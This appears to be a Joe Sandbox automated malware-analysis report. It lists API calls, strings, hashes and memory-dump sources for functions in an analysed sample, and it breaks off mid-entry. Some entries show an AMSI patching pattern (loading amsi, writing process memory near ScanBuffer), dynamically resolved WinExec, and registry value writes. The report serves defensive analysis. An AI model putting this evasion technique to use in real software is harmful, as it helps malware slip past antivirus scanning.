                                                                                                                                              • Opcode Fuzzy Hash: 730f6591b619deeed75d7d1935b4e7c333617a599ff3fceec19ba65b726c0d34
                                                                                                                                              • Instruction Fuzzy Hash: A251AB756012408FE716CF78C988766BBE4AF45314FA885BED94C8B2C7E770D445CBA1

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryW.KERNEL32(amsi), ref: 027D8715
                                                                                                                                                • Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D
                                                                                                                                                • Part of subcall function 027D7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027D7D74
                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 027D8774
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                                              • String ID: DllGetClassObject$W$amsi
                                                                                                                                              • API String ID: 941070894-2671292670
                                                                                                                                              • Opcode ID: b4166bc53e1328c452012d14076fed64189ad7e81d926994db85f032bd1c87af
                                                                                                                                              • Instruction ID: beb0ae10a0ee72e20d8e880d62e812f7a4d857a11231dfa91bd4141c9fc2e3c1
                                                                                                                                              • Opcode Fuzzy Hash: b4166bc53e1328c452012d14076fed64189ad7e81d926994db85f032bd1c87af
                                                                                                                                              • Instruction Fuzzy Hash: E9F0445054C38179E202E6748C49F4FBEDD4B92324F448A5DF1E8562D2D675D1058767

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 027DE436
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CheckConnectionInternet
                                                                                                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                              • API String ID: 3847983778-3852638603
                                                                                                                                              • Opcode ID: 05e7d57321ea27dc39e185b6dd22c923595474b8abf9a2394846db3d3b8ad2e3
                                                                                                                                              • Instruction ID: ccdd00ba2d1a18279cfbfa393fb1ed094fb3112375b05cb97f545e1a823991c5
                                                                                                                                              • Opcode Fuzzy Hash: 05e7d57321ea27dc39e185b6dd22c923595474b8abf9a2394846db3d3b8ad2e3
                                                                                                                                              • Instruction Fuzzy Hash: 9741EA71A501189BEB12FBB4CDA5E9EB7FAEF8C310F21443DE041AB244DA74AD018F60
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 027D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027D8090,?,?,00000000,?,027D7A06,ntdll,00000000,00000000,027D7A4B,?,?,00000000), ref: 027D805E
                                                                                                                                                • Part of subcall function 027D8020: GetModuleHandleA.KERNELBASE(?), ref: 027D8072
                                                                                                                                                • Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D
                                                                                                                                              • WinExec.KERNEL32(?,?), ref: 027D8478
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule$AddressProc$Exec
                                                                                                                                              • String ID: Kernel32$WinExec
                                                                                                                                              • API String ID: 2292790416-3609268280
                                                                                                                                              • Opcode ID: 1e3e46242bee6f53032ce3a8e7d9ef5008b92a2ec6d6ab00087acf4a32b7cf4c
                                                                                                                                              • Instruction ID: 4a4739277df85d2c9ef4b3789d31258400cf1e601a76ff2a08d79d8665554cad
                                                                                                                                              • Opcode Fuzzy Hash: 1e3e46242bee6f53032ce3a8e7d9ef5008b92a2ec6d6ab00087acf4a32b7cf4c
                                                                                                                                              • Instruction Fuzzy Hash: 69018179644208BFEB11EFA4DC69F5A7BFEE748700FA28428F504D3640D678BD058B25
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 027D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027D8090,?,?,00000000,?,027D7A06,ntdll,00000000,00000000,027D7A4B,?,?,00000000), ref: 027D805E
                                                                                                                                                • Part of subcall function 027D8020: GetModuleHandleA.KERNELBASE(?), ref: 027D8072
                                                                                                                                                • Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D
                                                                                                                                              • WinExec.KERNEL32(?,?), ref: 027D8478
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule$AddressProc$Exec
                                                                                                                                              • String ID: Kernel32$WinExec
                                                                                                                                              • API String ID: 2292790416-3609268280
                                                                                                                                              • Opcode ID: b668c782ab5d40aec74b1317876ccaed08c1cf13aeb8ebb75a9e38dc93218864
                                                                                                                                              • Instruction ID: b888e119cf7d171ff11c653ee23efca516940fbab5c3cd9406afb35b6102a168
                                                                                                                                              • Opcode Fuzzy Hash: b668c782ab5d40aec74b1317876ccaed08c1cf13aeb8ebb75a9e38dc93218864
                                                                                                                                              • Instruction Fuzzy Hash: 65F08179644208BFEB11EFA4DC69F5A7BFEE748700FA28428F504D3640D678B9058B25
                                                                                                                                              APIs
                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,027D5CFC,?,?,027D3888,00000001), ref: 027D5C10
                                                                                                                                              • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,027D5CFC,?,?,027D3888,00000001), ref: 027D5C3E
                                                                                                                                                • Part of subcall function 027C7D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,027D3888,027D5C7E,00000000,027D5CFC,?,?,027D3888), ref: 027C7D66
                                                                                                                                                • Part of subcall function 027C7F20: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,027D3888,027D5C99,00000000,027D5CFC,?,?,027D3888,00000001), ref: 027C7F3F
                                                                                                                                              • GetLastError.KERNEL32(00000000,027D5CFC,?,?,027D3888,00000001), ref: 027D5CA3
                                                                                                                                                • Part of subcall function 027CA700: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,027CC361,00000000,027CC3BB), ref: 027CA71F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 503785936-0
                                                                                                                                              • Opcode ID: 0288c47437545926f14b2950ec971366316de3742301a0900e777cb709734e0c
                                                                                                                                              • Instruction ID: 3180a25668ce6201525b2c2d64b199fb18553c088fdc0062af25f4e0e879919c
                                                                                                                                              • Opcode Fuzzy Hash: 0288c47437545926f14b2950ec971366316de3742301a0900e777cb709734e0c
                                                                                                                                              • Instruction Fuzzy Hash: F1316374A002199FDB01EFB8C89579EBBF6AF48314FA0846DE904E7380DB7559058FA5
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyA.ADVAPI32(?,00000000,02915914), ref: 027DE704
                                                                                                                                              • RegSetValueExA.ADVAPI32(0000088C,00000000,00000000,00000001,00000000,0000001C,00000000,027DE76F), ref: 027DE73C
                                                                                                                                              • RegCloseKey.ADVAPI32(0000088C,0000088C,00000000,00000000,00000001,00000000,0000001C,00000000,027DE76F), ref: 027DE747
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseOpenValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 779948276-0
                                                                                                                                              • Opcode ID: 2f9602c7d913a8db1775a846004281514e1539a1e8f368e5d3b320e6845492dd
                                                                                                                                              • Instruction ID: 66f6095e776d5c1388a968c802586ba33ed5419691dfb173ccbe64d0c46b8d0e
                                                                                                                                              • Opcode Fuzzy Hash: 2f9602c7d913a8db1775a846004281514e1539a1e8f368e5d3b320e6845492dd
                                                                                                                                              • Instruction Fuzzy Hash: D0118C71A50218AFEB06EFB8D8A596E7BFDEB48320FA1002CB505DB250D730DE00CA61
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyA.ADVAPI32(?,00000000,02915914), ref: 027DE704
                                                                                                                                              • RegSetValueExA.ADVAPI32(0000088C,00000000,00000000,00000001,00000000,0000001C,00000000,027DE76F), ref: 027DE73C
                                                                                                                                              • RegCloseKey.ADVAPI32(0000088C,0000088C,00000000,00000000,00000001,00000000,0000001C,00000000,027DE76F), ref: 027DE747
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseOpenValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 779948276-0
                                                                                                                                              • Opcode ID: b243765fd4eb3792062ebfbe49dc1f15ff6894765dc07398a164db9610af2e32
                                                                                                                                              • Instruction ID: 61fac3968d67878e965124128bbe75d89574e34aae42892ed8c0fc44a9f6a4ac
                                                                                                                                              • Opcode Fuzzy Hash: b243765fd4eb3792062ebfbe49dc1f15ff6894765dc07398a164db9610af2e32
                                                                                                                                              • Instruction Fuzzy Hash: C4118C71A50218AFEB06EFB8D8A596E7BBDEB48320FA1002CB505DB250D730DA00CA61
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1473721057-0
                                                                                                                                              • Opcode ID: f55f3649965995973b169e913ebded30048cee28afb93ac6f0ae8e9c705b5673
                                                                                                                                              • Instruction ID: 4ac30d737b128bbb5bb49804b49a22e6377746e9ccae1e04d81028791b2169fc
                                                                                                                                              • Opcode Fuzzy Hash: f55f3649965995973b169e913ebded30048cee28afb93ac6f0ae8e9c705b5673
                                                                                                                                              • Instruction Fuzzy Hash: EFF0622470421487D722BB39C9CC66D269EBF81710B71543EA48AAB286CB34EC46CB62
                                                                                                                                              APIs
                                                                                                                                              • SysFreeString.OLEAUT32(027DE950), ref: 027C4C1A
                                                                                                                                              • SysAllocStringLen.OLEAUT32(?,?), ref: 027C4D07
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 027C4D19
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: String$Free$Alloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 986138563-0
                                                                                                                                              • Opcode ID: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
                                                                                                                                              • Instruction ID: f489d154f14f04dd5482227d9025aab7bbafb722a25934a8d71547664d98c47c
                                                                                                                                              • Opcode Fuzzy Hash: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
                                                                                                                                              • Instruction Fuzzy Hash: 2BE012FC2062015EEF252F31DC64B37772AAFC1741B7444ADA804CA169DB34D441AE34
                                                                                                                                              APIs
                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 027D7362
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString
                                                                                                                                              • String ID: H
                                                                                                                                              • API String ID: 3341692771-2852464175
                                                                                                                                              • Opcode ID: b95a6ea17d0594774d646628b1e709403209a4723446e0fb73e0513076139b50
                                                                                                                                              • Instruction ID: 06460ed43271882006e1a569281f6d495b9e776a4dcf9caf6610d8995dbbcadb
                                                                                                                                              • Opcode Fuzzy Hash: b95a6ea17d0594774d646628b1e709403209a4723446e0fb73e0513076139b50
                                                                                                                                              • Instruction Fuzzy Hash: 0BB1E074A016489FDB19CFA9D880A9EFBF6FF89314F248569E805AB360D731AC45CF50
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,027D890B), ref: 027D8858
                                                                                                                                                • Part of subcall function 027D8020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027D8090,?,?,00000000,?,027D7A06,ntdll,00000000,00000000,027D7A4B,?,?,00000000), ref: 027D805E
                                                                                                                                                • Part of subcall function 027D8020: GetModuleHandleA.KERNELBASE(?), ref: 027D8072
                                                                                                                                                • Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D
                                                                                                                                                • Part of subcall function 027D7D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027D7D74
                                                                                                                                              • FreeLibrary.KERNEL32(74AD0000,00000000,02821388,Function_000065D8,00000004,02821398,02821388,05F5E0FF,00000040,0282139C,74AD0000,00000000,00000000,00000000,00000000,027D890B), ref: 027D88EB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule$AddressLibraryProc$FreeLoadMemoryVirtualWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3283153180-0
                                                                                                                                              • Opcode ID: 678b1df041d189950aaafa80ec419ed1cc256885a9d9b2e87d5715bdcd7e2dcb
                                                                                                                                              • Instruction ID: f7ad1374bdec0a3891c13fb7816988faa6875898bc425638ba16669bcd03ab8a
                                                                                                                                              • Opcode Fuzzy Hash: 678b1df041d189950aaafa80ec419ed1cc256885a9d9b2e87d5715bdcd7e2dcb
                                                                                                                                              • Instruction Fuzzy Hash: 3E11D678A40314AFEB16FBB4DA5EA5E77BADB45710F72047CB208F3B81CA3899054B15
                                                                                                                                              APIs
                                                                                                                                              • VariantCopy.OLEAUT32(00000000,00000000), ref: 027CE709
                                                                                                                                                • Part of subcall function 027CE2EC: VariantClear.OLEAUT32(?), ref: 027CE2FB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Variant$ClearCopy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 274517740-0
                                                                                                                                              • Opcode ID: 96f2b68a4013dd40952554c94f3bf696cd20cc46e2d2167009ebb9bf0d8a08ed
                                                                                                                                              • Instruction ID: e3472507e1936811b95808f638146492818553a92c4d37831f4e1863220c8241
                                                                                                                                              • Opcode Fuzzy Hash: 96f2b68a4013dd40952554c94f3bf696cd20cc46e2d2167009ebb9bf0d8a08ed
                                                                                                                                              • Instruction Fuzzy Hash: 9E11822070021197C732AF39CDC866677AAEF85750735943EE94AAF25ADB30CC41CB62
                                                                                                                                              APIs
                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,027C1A03,?,027C2000), ref: 027C15E2
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID: 0`
                                                                                                                                              • API String ID: 4275171209-3339448193
                                                                                                                                              • Opcode ID: 307e4559847121004791d6b698fd4455ed73501a99075d713c90dae0ff9b7907
                                                                                                                                              • Instruction ID: 9de3c2f69220ce88664a92467b916c511b2f5ccdf1e983afc49957dc47d76d50
                                                                                                                                              • Opcode Fuzzy Hash: 307e4559847121004791d6b698fd4455ed73501a99075d713c90dae0ff9b7907
                                                                                                                                              • Instruction Fuzzy Hash: C0F0F9F4B513004FEB0ADF7999443067ADAEB8A344F64897DDB09DB3D9E77194118B10
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
